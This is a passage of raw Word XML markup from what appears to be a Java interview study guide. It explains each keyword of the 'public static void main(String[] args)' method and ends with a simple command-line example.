          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="59BF5438">
          <v:rect id="_x0000_i1052" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6F0D0E" w14:textId="0F1BE18A" w:rsidR="009A5C5C" w:rsidRPr="00CE4B95" w:rsidRDefault="009A5C5C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc196307488"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain public static void main (String[] args) method?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="1D589C2A" w14:textId="5A1F2F55" w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w:rsidRDefault="006C37EB" w:rsidP="00CE1D69">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Hi</w:t>
      </w:r>
      <w:r w:rsidR="002D4D31" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔍</w:t>
      </w:r>
      <w:r w:rsidR="002D4D31" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Breakdown of each keywor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3"/>
        <w:gridCol w:w="6356"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w14:paraId="5C0275AB" w14:textId="77777777" w:rsidTr="002D4D31">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B6BAF74" w14:textId="77777777" w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w:rsidRDefault="002D4D31" w:rsidP="002D4D31">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Part</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D36D7D3" w14:textId="77777777" w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w:rsidRDefault="002D4D31" w:rsidP="002D4D31">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Meaning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w14:paraId="7DA9DC5B" w14:textId="77777777" w:rsidTr="002D4D31">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65690DEA" w14:textId="77777777" w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w:rsidRDefault="002D4D31" w:rsidP="002D4D31">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>public</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A47C053" w14:textId="77777777" w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w:rsidRDefault="002D4D31" w:rsidP="002D4D31">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Access modifier – means this method can be called from anywhere.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w14:paraId="6E1FF205" w14:textId="77777777" w:rsidTr="002D4D31">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="787795B4" w14:textId="77777777" w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w:rsidRDefault="002D4D31" w:rsidP="002D4D31">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>static</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EB703F8" w14:textId="77777777" w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w:rsidRDefault="002D4D31" w:rsidP="002D4D31">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>No need to create an object to call this method — JVM calls it directly.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w14:paraId="70126B8E" w14:textId="77777777" w:rsidTr="002D4D31">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A949B1B" w14:textId="77777777" w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w:rsidRDefault="002D4D31" w:rsidP="002D4D31">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>void</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="120F4D3A" w14:textId="77777777" w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w:rsidRDefault="002D4D31" w:rsidP="002D4D31">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Return type – it doesn't return any value to the JVM.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w14:paraId="72C3E51F" w14:textId="77777777" w:rsidTr="002D4D31">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DB51D5A" w14:textId="77777777" w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w:rsidRDefault="002D4D31" w:rsidP="002D4D31">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>main</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7833B56C" w14:textId="77777777" w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w:rsidRDefault="002D4D31" w:rsidP="002D4D31">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Method name – JVM looks for this specific method as the entry point.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w14:paraId="2227FF0B" w14:textId="77777777" w:rsidTr="002D4D31">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6039BDE3" w14:textId="77777777" w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w:rsidRDefault="002D4D31" w:rsidP="002D4D31">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>String[] args</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22368F66" w14:textId="77777777" w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w:rsidRDefault="002D4D31" w:rsidP="002D4D31">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Command-line arguments – passed to your program when it starts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="73700B4E" w14:textId="77777777" w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="002D4D31">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="14730C7E">
          <v:rect id="_x0000_i1053" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6EA606" w14:textId="77777777" w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w:rsidRDefault="002D4D31" w:rsidP="002D4D31">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Why each part is important?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE4033B" w14:textId="77777777" w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w:rsidRDefault="002D4D31" w:rsidP="002D4D31">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public</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655CBA1C" w14:textId="77777777" w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w:rsidRDefault="002D4D31">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="97"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Must be </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> so that </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JVM can access it</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from outside the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315CAF8C" w14:textId="77777777" w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w:rsidRDefault="002D4D31" w:rsidP="002D4D31">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static</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC74C80" w14:textId="77777777" w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w:rsidRDefault="002D4D31">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JVM doesn't create an object of your class to call main().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CE9EA5" w14:textId="77777777" w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w:rsidRDefault="002D4D31">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Declared static so it can be called </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>without creating an instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA8F91C" w14:textId="77777777" w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w:rsidRDefault="002D4D31" w:rsidP="002D4D31">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void</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4969607E" w14:textId="77777777" w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w:rsidRDefault="002D4D31">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>main() doesn’t return anything. It's just the entry point.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA799E3" w14:textId="77777777" w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w:rsidRDefault="002D4D31" w:rsidP="002D4D31">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main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC78AAF" w14:textId="77777777" w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w:rsidRDefault="002D4D31">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="100"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JVM always looks for this method name to start the program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142020A9" w14:textId="77777777" w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w:rsidRDefault="002D4D31" w:rsidP="002D4D31">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String[] args</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F91B901" w14:textId="77777777" w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w:rsidRDefault="002D4D31">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>An array of String values passed during command-line execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04732B64" w14:textId="77777777" w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w:rsidRDefault="002D4D31">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CCDB0F" w14:textId="77777777" w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w:rsidRDefault="002D4D31" w:rsidP="00331D26">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>java MyApp Hello World</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FC74D0" w14:textId="77777777" w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w:rsidRDefault="002D4D31" w:rsidP="00331D26">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Then args[0] = "Hello", args[1] = "World"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681A2966" w14:textId="77777777" w:rsidR="002D4D31" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="002D4D31">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="1CB2FC31">
          <v:rect id="_x0000_i1054" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
